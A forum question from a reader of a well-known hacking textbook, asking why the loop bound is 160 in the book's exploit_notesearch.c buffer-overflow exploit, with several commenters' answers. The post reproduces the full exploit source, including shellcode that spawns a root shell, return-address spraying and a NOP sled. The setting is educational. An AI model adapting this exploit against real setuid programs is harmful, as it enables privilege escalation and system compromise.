# What is the logic behind the For Loop Condition, "for( i = 0; i < 160; i += 4 )" in exploit_notesearch.c in Hacking - The Art of Exploitation Book

Tags: for-loop, math, memory, buffer-overflow, exploit

I've been focused on this book for several years trying to get through it slowly but truly by understanding all of the details. However, I've come to a roadblock with a specific line of code in the *exploit_notesearch.c* program source file. The for loop on **line 24** reads, "for(i = 0; **i < 160**; i += 4)".

The entire program source code block is as follows:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
        "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
        "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
        "\xe1\xcd\x80";

int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset = 270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200); // Zero out the new memory.
    strcpy(command, "./notesearch \'"); // Start command buffer.
    buffer = command + strlen(command); // Set buffer at the end.

    if (argc > 1) // Set offset.
        offset = atoi(argv[1]);

    ret = (unsigned int) &i - offset; // Set return address.
    for (i = 0; i < 160; i += 4) // Fill buffer with return address.
        *((unsigned int *) (buffer + i)) = ret;
    memset(buffer, 0x90, 60); // Build NOP sled.
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
    strcat(command, "\'");
    system(command); // Run exploit.
    free(command);
}
```

What I'm not understanding with this line of code is the specific value chosen by the author of *160* (shown in bold above). Why is the value *160*? Can someone please explain the logic to me?

Going through GDB I figured out that changing the value from *160* to a lower value kept the starting location the same for the NOP sled in the **buffer**. However, there were less bytes written to memory. With less written, the return address of the target may or may not be overwritten since if less bytes are overwritten when writing then the repeated return address may not reach the target return address. This depends on *how much* the value is lowered, if I understand correctly. However, this still confuses me, as from the comment itself, it states that the loop *fills the buffer with the return address*. To me, this makes it seem like the value 160 fills the *entire* buffer, but I'm just not sure. I do not understand the logic.

I even counted the length of the shellcode (35 bytes) and added that to the length of the initial command (15 bytes not including escape character) and coming to the value of **50**, adding that to 160 to result in 210, it definitely doesn't make sense to me. (210 would be beyond the allocated heap size of 200)

I guess my main question is **what is the relationship between the value 160 as it is used in the loop and the size of the buffer?**

Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?

Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable **and** *buffer variable? Couldn't we simply use one of them?

Any assistance is greatly appreciated.

Comment: `what is the relationship between the value 160 as it is used in the loop and the size of the buffer?` no relation, just number big enough to fill almost whole array without going out of bounds

Comment: `Couldn't we simply use one of them` yes, but it will complicate math, because you have to accommodate for first several symbols already in command, so it is easier to create new variable and point it at the end of `./notsearch`

Comment: `adding that to 160 to result in 210` you don't add shellcode after 160, you're adding it at buffer+60 location

Comment: Magic numbers are always a bad idea in code.  Here's another example of why.